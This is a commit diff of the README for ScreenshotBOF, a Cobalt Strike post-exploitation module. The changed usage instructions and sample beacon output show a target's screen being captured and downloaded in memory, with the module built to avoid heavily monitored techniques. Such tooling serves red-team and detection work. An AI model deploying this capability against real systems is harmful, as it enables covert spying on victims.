This commit is contained in:
CodeXTF2 2022-10-26 00:35:38 +08:00
parent 1383db6e7e
commit 7e0ee92cc4
1 changed files with 8 additions and 16 deletions

View File

@ -1,6 +1,6 @@
# ScreenshotBOF # ScreenshotBOF
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
## Self Compilation ## Self Compilation
1. git clone the repo 1. git clone the repo
@ -9,29 +9,20 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does
## Usage ## Usage
1. import the screenshotBOF.cna script into Cobalt Strike 1. import the screenshotBOF.cna script into Cobalt Strike
2. use the command screenshot_bof 2. use the command screenshot_bof {local filename}
3. Download the screenshot from the target
``` ```
beacon> screenshot_bof beacon> screenshot_bof sad.bmp
[*] Running screenshot BOF by (@codex_tf2) [*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 3411 bytes [+] host called home, sent: 4860 bytes
[+] received output: [+] received output:
[*] Tasked beacon to printscreen and save to disk [*] Tasked beacon to printscreen and save to sad.bmp
[+] received output: [+] received output:
[+] PrintScreen saved to bitmap... [+] PrintScreen saved to bitmap...
[+] received output: [*] started download of sad.bmp
[+] Printscreen bitmap saved to screenshot.bmp
beacon> download screenshot.bmp
[*] Tasked beacon to download screenshot.bmp
[+] host called home, sent: 22 bytes
[*] started download of C:\screenshot.bmp (12441668 bytes)
[*] download of screenshot.bmp is complete
``` ```
## Notes ## Notes
- no evasion is performed, which should be fine since the WinAPIs used are not malicious - no evasion is performed, which should be fine since the WinAPIs used are not malicious
- in memory downloading of screenshots is planned to be added
- the filename can be changed in the source code.
## Why did I make this? ## Why did I make this?
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability. Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
@ -39,3 +30,4 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
## Credits ## Credits
- Made using https://github.com/securifybv/Visual-Studio-BOF-template - Made using https://github.com/securifybv/Visual-Studio-BOF-template
- Save BMP to file from https://stackoverflow.com/a/60667564 - Save BMP to file from https://stackoverflow.com/a/60667564
- in memory download from https://github.com/anthemtotheego/CredBandit